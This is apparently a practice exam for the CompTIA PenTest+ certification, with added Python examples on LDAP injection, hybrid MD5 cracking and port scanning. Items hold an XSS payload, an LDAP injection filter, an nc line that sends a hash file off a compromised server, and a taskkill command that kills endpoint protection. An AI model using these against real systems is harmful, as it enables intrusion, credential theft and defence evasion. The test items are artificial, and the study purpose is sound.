Test F CompTIA pentest+ PT0-002
Title of test: Test F CompTIA pentest+ PT0-002
Description: CompTIA pentest+ PT0-002
Creation Date: 2024/09/16
Category: Others
Number of questions: 42
1. A penetration tester needs to perform a vulnerability scan on a highly critical and fragile infrastructure system. Which of the following should the penetration tester do to minimize the risk?
   - Implement query throttling.
   - Use high-bandwidth scanning techniques.
   - Enable aggressive and indiscriminate scanning options.
   - Use a SYN flag to avoid detection.

2. A penetration tester discovers a login page during an assessment. Which of the following tools would the tester use to brute force a password?
   - Hydra.
   - Wireshark.
   - SQLmap.
   - TinEye.

3. A penetration test is in the scoping phase of an engagement. Which of the following describes how a penetration tester would most effectively obtain the information necessary to begin testing?
   - Wait for the client to tell them.
   - Start an email chain so communications are documented.
   - Ask previous penetration test providers what they looked at.
   - Send a pre-engagement survey to the client to fill out.

4. A penetration tester would like to know if any web servers or mail servers are running on the in-scope network segment. Which of the following is the best to use in this scenario?
   - ARP scans.
   - Website crawling.
   - DNS lookups.
   - Nmap probes.

5. During an engagement with a financial institution, a penetration tester found hard-coded credentials in a publicly accessible code repository. Those credentials allowed the penetration tester to access PII from many of the institution's customers and services that are hosted by a cloud provider. Which of the following actions should the penetration tester do next?
   - Proceed with the engagement and add the evidence in the final report.
   - Keep the found credentials and use them during the engagement.
   - Disclose the findings through a bug bounty platform.
   - Report the findings to the customer's technical contact immediately.

6. A penetration tester captures SMB network traffic and discovers that users are mistyping the name of a fileshare server.
This causes the workstations to send out requests attempting to resolve the fileshare server's name. Which of the following is the best way for a penetration tester to exploit this situation?
   - Relay the traffic to the real file server and steal documents as they pass through.
   - Host a malicious file to compromise the workstation.
   - Reply to the broadcasts with a fake IP address to deny access to the real file server.
   - Respond to the requests with the tester's IP address and steal authentication credentials.

7. A security analyst is conducting a penetration test for an online store with a database server. Which of the following tools would best assist the tester in detecting vulnerabilities on that server?
   - Burp Suite.
   - Nessus.
   - Nikto.
   - SQLmap.

8. A company developed a new web application to allow its customers to submit loan applications. A penetration tester is reviewing the application and discovers that it was developed in ASP and uses MSSQL for its back-end database. Using the application's search form, the penetration tester enters the following code in the search input field:
   IMG SRC=vbscript:msgbox("Vulnerable_to_Attack");>originalAttribute="SRC"originalPath="vbscript;msgbox ("Vulnerable_to_Attack ");>"
   When the tester clicks the submit button on the search form, the web browser returns a pop-up window that displays "Vulnerable_to_Attack." Which of the following vulnerabilities did the tester discover in the web application?
   - SQL injection.
   - Command injection.
   - Cross-site request forgery.
   - Cross-site scripting.

9. Which of the following legal concepts specifically outlines the scope, deliverables, and timelines of a project or engagement?
   - MSA.
   - NDA.
   - SLA.
   - SOW.

10. A client claims that a ransomware attack has crippled its corporate network following a penetration test assessment. Which of the following is the most likely root cause of this issue?
   - Client reluctance to accept findings.
   - Lack of attestation.
   - Incomplete data destruction process.
   - Failure to remove tester-created credentials.

11. A penetration tester is conducting an on-path link layer attack in order to take control of a key fob that controls an electric vehicle. Which of the following wireless attacks would allow a penetration tester to achieve a successful attack?
   - Bluejacking.
   - Bluesnarfing.
   - BLE attack.
   - WPS PIN attack.

12. A penetration tester runs an Nmap scan and obtains the following output (the scan output is not reproduced on the page). Which of the following should the penetration tester run next to explore this host further?
   - OpenVAS.
   - BloodHound.
   - DirBuster.
   - Nikto.

13. A penetration tester is conducting a physical test against an organization. During the first day of the assessment, the tester follows an employee to the coffee shop next door. While the employee is ordering, the tester stands near the employee and captures the employee's badge electronically. Which of the following exploits is the penetration tester most likely conducting?
   - Tailgating.
   - Bluesnarfing.
   - RFID cloning.
   - Session hijacking.

14. As part of active reconnaissance, a penetration tester intercepts and analyzes network traffic, including API requests and responses. Which of the following can be gained by capturing and examining the API traffic?
   - Assessing the performance of the network's API communication.
   - Identifying the token/authentication detail.
   - Enumerating all users of the application.
   - Extracting confidential user data from the intercepted API responses.

15. Which of the following is a declaration from an independent third party that lends credibility to the part of the organization undergoing the review and is required as part of an audit?
   - Executive summary.
   - Client acceptance.
   - Attestation of findings.
   - Lessons learned.

16. During an assessment, a penetration tester discovers the following code sample in a web application:
   "(&(userid=*)(userid=*))(|(userid=*) (userPwd={SHA1}a9993e364706816aba3e25717850c26c9cd0d89d==))";
   Which of the following injections is being performed?
   - Boolean SQL.
   - Command.
   - Blind SQL.
   - LDAP.
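The filter in the LDAP question above is what you get when a login form concatenates the submitted user ID straight into an LDAP search filter. The following Python is an added example, not code from the exam page or from any vendor: it rebuilds that exact filter from a hypothetical login form, emulates a server that evaluates the first complete filter and ignores the trailing text (the behaviour the classic injection relies on), and shows the RFC 4515 hex-escaping that reduces the payload to a harmless literal. The directory entries, the `userid`/`userPwd` attribute names and the stored hash strings are constructed for the demo.

```python
"""LDAP filter injection, end to end, with a toy filter evaluator.
Added example for the LDAP-injection question; not code from the exam page."""
import re

# RFC 4515 section 3: these characters must be hex-escaped inside an assertion value.
_LDAP_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_ldap_value(value: str) -> str:
    """Escape untrusted input so it can only ever be matched as a literal value."""
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


def login_filter_vulnerable(userid: str, pwd_hash: str) -> str:
    """Naive concatenation: metacharacters in userid become filter syntax."""
    return f"(&(userid={userid})(userPwd={pwd_hash}))"


def login_filter_safe(userid: str, pwd_hash: str) -> str:
    """The same filter with both values escaped per RFC 4515."""
    return f"(&(userid={escape_ldap_value(userid)})(userPwd={escape_ldap_value(pwd_hash)}))"


def parse_filter(s: str, i: int = 0):
    """Parse one filter starting at s[i]; return (node, index just after it).
    Supports the &, |, ! operators and equality matches with '*' wildcards."""
    if s[i] != "(":
        raise ValueError(f"expected '(' at offset {i}")
    i += 1
    if s[i] in "&|":
        op, children, i = s[i], [], i + 1
        while s[i] == "(":
            child, i = parse_filter(s, i)
            children.append(child)
        return (op, children), i + 1            # skip the closing ')'
    if s[i] == "!":
        child, i = parse_filter(s, i + 1)
        return ("!", [child]), i + 1
    j = s.index(")", i)                          # an escaped ')' is '\29', so this is the real close
    attr, _, value = s[i:j].partition("=")
    return ("=", attr, value), j + 1


def _value_to_regex(value: str) -> str:
    """Assertion value -> regex: an unescaped '*' is a wildcard, '\\XX' is one literal char."""
    out, i = "", 0
    while i < len(value):
        if value[i] == "\\":
            out += re.escape(chr(int(value[i + 1:i + 3], 16)))
            i += 3
        elif value[i] == "*":
            out += ".*"
            i += 1
        else:
            out += re.escape(value[i])
            i += 1
    return out


def matches(node, entry: dict) -> bool:
    kind = node[0]
    if kind == "&":
        return all(matches(c, entry) for c in node[1])
    if kind == "|":
        return any(matches(c, entry) for c in node[1])
    if kind == "!":
        return not matches(node[1][0], entry)
    _, attr, value = node
    actual = entry.get(attr)
    return actual is not None and re.fullmatch(_value_to_regex(value), actual) is not None


def search(filter_str: str, directory: list) -> list:
    """Emulate a server that parses the first complete filter and silently ignores
    whatever follows it; returns the userids that match."""
    node, _ = parse_filter(filter_str)
    return [e["userid"] for e in directory if matches(node, e)]


# Constructed directory for the demo; the stored values are placeholders, not real hashes.
DIRECTORY = [
    {"userid": "jsmith", "userPwd": "{SHA1}hash-of-jsmith-password"},
    {"userid": "admin", "userPwd": "{SHA1}hash-of-admin-password"},
]
# The userid payload that produces the exam's filter when concatenated naively.
PAYLOAD = "*)(userid=*))(|(userid=*"
PWD_HASH = "{SHA1}a9993e364706816aba3e25717850c26c9cd0d89d=="

if __name__ == "__main__":
    vuln = login_filter_vulnerable(PAYLOAD, PWD_HASH)
    print(vuln)                                                      # the filter from the question
    print(search(vuln, DIRECTORY))                                   # ['jsmith', 'admin']: everyone logs in
    print(search(login_filter_safe(PAYLOAD, PWD_HASH), DIRECTORY))   # []: payload is now a literal userid
```

The fix is escaping at the point where untrusted data enters the filter (or using a client library's filter builder that does it for you); the `(&...)` wrapper alone does nothing, because the payload closes it and opens a tautology `(|(userid=*)...)` of its own.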
17. A penetration tester gained access to one of the target company's servers. During the enumeration phase, the penetration tester lists the bash history and observes the following row:
   curl -k 'imaps://10.12.14.121' --user jsmith:Blu3moon -v
   Which of the following steps should the penetration tester take next?
   - Brute force all mail users.
   - Enumerate mail server users.
   - Attempt to read email.
   - Download hashes.

18. A penetration tester wants to crack MD5 hashes more quickly. The tester knows that the first part of the password is Winter followed by four digits and a special character at the end. Which of the following commands should the tester use?
   - john hash.txt --format=MD5 --wordlist=seasons.txt --fork=8 --rules=base64
   - hashcat hash.txt -m 0 -a 6 seasons.txt ?d?d?d?d?s
   - john hash.txt --format=Raw-MD5 --rules=jumbo --wordlist=seasons.txt
   - hashcat hash.txt -m 500 -a 7 --force -) -w 4 --opencl-device-types 1,2

19. A penetration tester managed to get control of an internal web server that is hosting the IT knowledge base. Which of the following attacks should the penetration tester attempt next?
   - Vishing.
   - Watering hole.
   - Whaling.
   - Spear phishing.

20. Which of the following best explains why a penetration tester would use ProxyChains during an assessment?
   - To harvest credentials.
   - To use remote access tools.
   - To fingerprint the organization.
   - To automate protocols.

21. A penetration tester gets a shell on a server and runs the following command:
   nc kaliworkstation 4444 < hashes.txt
   The penetration tester runs the following command on a Kali workstation:
   nc -nlvp 4444 > hashes.txt
   Which of the following best describes what the penetration tester is attempting to do?
   - Exfiltrate a file from the server.
   - Obtain a higher privilege reverse shell.
   - Copy a file to the target server.
   - Delete a file from the Kali workstation.

22. Which of the following components should a penetration tester most likely include in a report at the end of an assessment?
   - Metrics and measures.
   - Client interviews.
   - Compliance information.
   - Business policies.

23. In a standard engagement, a post-report document is provided outside of the report. This document:
   • Does not contain specific findings
   • Exposes vulnerabilities
   • Can be shared publicly with outside parties that do not have an in-depth understanding of the client's network
   Which of the following documents is described?
   - Attestation letter.
   - Findings report.
   - Executive summary.
   - Non-disclosure agreement.

24. A penetration tester is configuring a vulnerability management solution to perform a scan of Linux servers on an enterprise network. The client wants to reduce potential disruptions as much as possible. Which of the following types of accounts should the tester use?
   - Read-only user.
   - SSH LDAP user.
   - Domain administrator.
   - Unprivileged user.

25. A penetration testing team has gained access to an organization's data center, but the team requires more time to test the attack strategy. Which of the following wireless attack techniques would be the most successful in preventing unintended interruptions?
   - Captive portal.
   - Evil twin.
   - Bluejacking.
   - Jamming.

26. A penetration tester is looking for a particular type of service and obtains the output below (the output is not reproduced on the page). Which of the following commands was executed by the tester?
   - nmap -sU -pU:517 -Pn -n --script=supermicro-ipmi-config
   - nmap -sU -pU:123 -Pn -n --script=ntp-monlist
   - nmap -sU -pU:161 -Pn -n --script=voldemort-info
   - nmap -sU -pU:37 -Bn -n --script=icap-info

27. A penetration tester is troubleshooting the right value for the urls variable that should be used in the following script (the script is not reproduced on the page). Which of the following instructions in a Python script will prevent duplicate entries in the output and work with the script above?
   - [u for u in url_list if u not in url_list]
   - list({u: True for u in url_list}.keys())
   - f"{u: True for u in url_list}"
   - json.dumps({u: True for u in url_list}.keys())
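The hashcat question above (Winter followed by four digits and a special character) is a hybrid attack: hashcat's `-a 6` appends every candidate from a mask to every wordlist entry, while `-a 7` prepends the mask to the word. The following Python is an added example, not code from the exam page or from hashcat itself: it re-implements that enumeration in plain Python so the keyspace and the order of candidates are visible. The wordlist standing in for seasons.txt, the target password and the hash it cracks are all constructed for the demo; only MD5 (`-m 0`) is implemented.

```python
"""Hybrid wordlist + mask attack (hashcat -a 6 / -a 7) re-implemented in Python
to show what `hashcat hash.txt -m 0 -a 6 seasons.txt ?d?d?d?d?s` enumerates.
Added example for the password-cracking question; not code from the exam page."""
import hashlib
import itertools
import string

# hashcat's built-in charsets: ?d digits, ?l lowercase, ?u uppercase, ?s specials (space included).
CHARSETS = {
    "?d": string.digits,
    "?l": string.ascii_lowercase,
    "?u": string.ascii_uppercase,
    "?s": " " + string.punctuation,
}


def mask_to_charsets(mask: str) -> list:
    """Split a mask such as '?d?d?d?d?s' (or 'Winter?d?d') into one charset per position."""
    sets, i = [], 0
    while i < len(mask):
        if mask[i] == "?":
            sets.append(CHARSETS[mask[i:i + 2]])
            i += 2
        else:                       # a literal character in the mask
            sets.append(mask[i])
            i += 1
    return sets


def mask_keyspace(mask: str) -> int:
    """Number of candidates the mask alone generates (hashcat's reported keyspace per word)."""
    n = 1
    for cs in mask_to_charsets(mask):
        n *= len(cs)
    return n


def md5_hex(plaintext: str) -> str:
    return hashlib.md5(plaintext.encode()).hexdigest()


def hybrid_attack(target_md5: str, wordlist, mask: str, mode: int = 6):
    """mode 6: word + mask suffix (hashcat -a 6); mode 7: mask prefix + word (hashcat -a 7).
    Returns the recovered plaintext, or None once the keyspace is exhausted."""
    target = target_md5.lower()
    sets = mask_to_charsets(mask)
    for word in wordlist:
        for combo in itertools.product(*sets):
            part = "".join(combo)
            candidate = word + part if mode == 6 else part + word
            if md5_hex(candidate) == target:
                return candidate
    return None


# Constructed wordlist standing in for seasons.txt, and a constructed target password.
SEASONS = ["Spring", "Summer", "Autumn", "Winter"]
TARGET_PLAINTEXT = "Winter2024!"


def crack_demo() -> str:
    """Crack MD5('Winter2024!') the way the -a 6 command in the question would."""
    return hybrid_attack(md5_hex(TARGET_PLAINTEXT), SEASONS, "?d?d?d?d?s")


if __name__ == "__main__":
    print("candidates per word:", mask_keyspace("?d?d?d?d?s"))   # 10^4 digits x 33 specials = 330000
    print("recovered:", crack_demo())
```

The point of the mask is the keyspace: 330,000 candidates per wordlist entry instead of the 95^5 (about 7.7 billion) a blind five-character brute force would need, which is why knowing the password structure matters more than raw hashing speed.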
28. While performing reconnaissance, a penetration tester runs Nmap and receives the following output:
   Nmap scan report for samplescan.org (44.33.55.66)
   Host is up (0.025s latency).
   Not shown: 992 closed tcp ports (conn-refused)
   PORT     STATE
   22/tcp   open
   23/tcp   open
   80/tcp   open
   443/tcp  open
   Nmap done: 1 IP address (1 host up) scanned in 5.52 seconds
   Which of the following ports should the penetration tester sniff the traffic on to obtain sensitive information?
   - 22.
   - 23.
   - 80.
   - 443.

29. During an assessment, a penetration tester was able to get access on all target servers by attempting authentication using a service account key that was published on the intranet site as part of a standard procedure. Which of the following should the penetration tester recommend for this type of finding?
   - Password encryption.
   - Role-based access control.
   - Secrets management solution.
   - Time-of-day restrictions.

30. A penetration tester discovers that an organization's infrastructure is hosted in the cloud. Which of the following technologies should the penetration tester explore for vulnerabilities? (Choose two.)
   - Virtualization.
   - Kubernetes.
   - Docker.
   - BIOS.
   - UEFI.
   - DNS.

31. Given the following table (the table is not reproduced on the page), which of the following data structures would most likely be used to store known-good configurations of firewall rules in a Python script?
   - Lists.
   - Trees.
   - Dictionaries.
   - Tuples.

32. Which of the following tools would be best to use to conceal data in various kinds of image files?
   - Kismet.
   - Snow.
   - Responder.
   - Metasploit.

33. A penetration tester runs a reconnaissance script and would like the output in a standardized machine-readable format in order to pass the data to another application. Which of the following is the best for the tester to use?
   - JSON.
   - Lists.
   - XLS.
   - Trees.

34. Which of the following best explains why communication is a vital phase of a penetration test?
   - To discuss situational awareness.
   - To build rapport with the emergency contact.
   - To explain the data destruction process.
   - To ensure the likelihood of future assessments.
35. Which of the following describes how a penetration tester could prioritize findings in a report?
   - Business mission and goals.
   - Cyberassets.
   - Network infrastructure.
   - Cyberthreats.

36. A penetration tester is doing an assessment for a company that requires an external command-and-control server. The command-and-control tool should be able to use multiple types of payloads (PowerShell, SMB, and binaries) and centralize the management of compromised systems. Which of the following tools should the tester use?
   - BeEF.
   - Covenant.
   - Censys.
   - Reaver.

37. A penetration tester is gathering information about a target company for a penetration test in order to tailor the type of attacks. However, the tester is worried about sending packets to the company that could tip off the SOC before the attacks begin. Which of the following sources should the tester use to achieve this objective?
   - Nmap.
   - Shodan.
   - CeWL.
   - Nessus.

38. Which of the following documents should be consulted if a client has an issue accepting a penetration test report that was provided?
   - Rules of engagement.
   - Signed authorization letter.
   - Statement of work.
   - Non-disclosure agreement.

39. A penetration testing firm performs an assessment every six months for the same customer. While performing network scanning for the latest assessment, the penetration tester observes that several of the target hosts appear to be residential connections associated with a major television and ISP in the area. Which of the following is the most likely reason for the observation?
   - The penetration tester misconfigured the network scanner.
   - The network scanning tooling is not functioning properly.
   - The IP ranges changed ownership.
   - The network scanning activity is being blocked by a firewall.

40. After successfully compromising a remote host, a security consultant notices an endpoint protection software is running on the host. Which of the following commands would be best for the consultant to use to terminate the protection software and its child processes?
   - taskkill /PID /T /F
   - taskkill /PID /IM /F
   - taskkill /PID /S /U
   - taskkill /PID /F /P

41. During a penetration test, a security consultant needs to automate the hash calculation of each password in a text file and store the results in memory. Which of the following Python snippets should the tester use to accomplish this task?
   - with open('passwords.txt') as f: lines = f.readlines(); hashes = [hashlib.sha256(password).hexdigest() for password in lines]
   - with open('passwords.txt') as f: lines = f.readlines(); hashes = [hashlib.sha256(line).hexdigest() for password in lines]
   - with open('passwords.txt') as f: lines = f.readlines(); hashes.append(hashlib.sha256(lines).hecdigest())
   - with open('passwords.txt') as f: lines = f.readlines(); hashes['result'] = hashlib.sha256(lines).hexdigest()

42. During a security assessment, a penetration tester decides to implement a simple TCP port scanner to check the open ports from 1000 to 2000. Which of the following Python scripts would achieve this task?
   - for i in range(1000, 2001): s = socket(AF_INET, SOCK_STREAM); conn = s.connect_ex((host_IP, i)); if (conn == 0): print(f'Port {i} OPEN'); s.close()
   - for i in range(1001, 2000): s = socket(AF_INET, SOCK_STREAM); conn = s.connect_ex((host_IP, i)); if (conn == 0): print(f'Port {i} OPEN'); s.close()
   - for i in range(1000, 2001): s = socket(AF_INET, SOCK_DGRAM); conn = s.connect_ex((host_IP, i)); if (conn == 0): print(f'Port {i} OPEN'); s.close()
   - for i in range(1000, 2000): s = socket(SOCK_STREAM, AF_INET); conn = s.connect_ex((host_IP, i)); if (conn == 0): print(f'Port {i} OPEN'); s.close()
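The three Python questions above (the duplicate-free URL list, the per-line password hashing, and the TCP port scanner) each have one option that is right in shape, but the hashing options as written hide two Python 3 pitfalls worth seeing run: `hashlib.sha256()` rejects a `str` (`TypeError: Strings must be encoded before hashing`), and `readlines()` keeps the trailing newline, so the snippet would hash `"password\n"` rather than `"password"`. The following is an added example, not code from the exam page, that implements all three tasks idiomatically. The password text, the URL list and the loopback listener the scanner probes are constructed for the demo, so it runs offline.

```python
"""Order-preserving de-duplication, per-line password hashing, and a connect_ex()
TCP port scan. Added example for the three Python questions; not code from the exam page."""
import hashlib
import io
import socket
from typing import Iterable, List


def dedupe(url_list: Iterable[str]) -> List[str]:
    """Drop duplicates while keeping first-seen order. dict keys are insertion-ordered
    in Python 3.7+, which is what makes list({u: True for u in url_list}.keys()) work."""
    return list(dict.fromkeys(url_list))


def hash_password_lines(lines: Iterable[str]) -> List[str]:
    """SHA-256 each line as the password it contains: strip the newline readlines()
    keeps, encode str -> bytes (hashlib refuses str), and skip blank lines."""
    hashes = []
    for line in lines:
        password = line.rstrip("\r\n")
        if not password:
            continue
        hashes.append(hashlib.sha256(password.encode("utf-8")).hexdigest())
    return hashes


def scan_ports(host: str, first: int, last: int, timeout: float = 0.5) -> List[int]:
    """TCP connect scan of ports first..last inclusive, i.e. range(first, last + 1).
    connect_ex() returns 0 on a completed handshake and an errno otherwise."""
    open_ports = []
    for port in range(first, last + 1):
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)                  # do not hang on filtered ports
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports


# --- constructed demo data ---------------------------------------------------------
PASSWORD_TEXT = "abc\nWinter2024!\n\nabc\n"        # stands in for passwords.txt
SHA256_ABC = "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad"
URLS = ["https://example.test/a", "https://example.test/b", "https://example.test/a"]


def hash_demo() -> List[str]:
    """Hash the constructed password file; blank line skipped, so three digests."""
    return hash_password_lines(io.StringIO(PASSWORD_TEXT))


def local_scan_demo():
    """Listen on an OS-chosen loopback port, scan a small window around it, and
    return (listening_port, ports_found) so the result can be checked."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        srv.bind(("127.0.0.1", 0))                 # port 0: the OS picks a free port
        srv.listen(5)                              # the kernel completes handshakes for us
        port = srv.getsockname()[1]
        found = scan_ports("127.0.0.1", max(port - 5, 1), min(port + 5, 65535))
        return port, found
    finally:
        srv.close()


if __name__ == "__main__":
    print(dedupe(URLS))
    print(hash_demo())
    print(local_scan_demo())
```

For the real 1000..2000 scan, `range(1000, 2001)` is the inclusive range the question asks for, and `SOCK_STREAM` is what makes `connect_ex()` meaningful: a UDP socket "connects" without any handshake, so it would report every port as open.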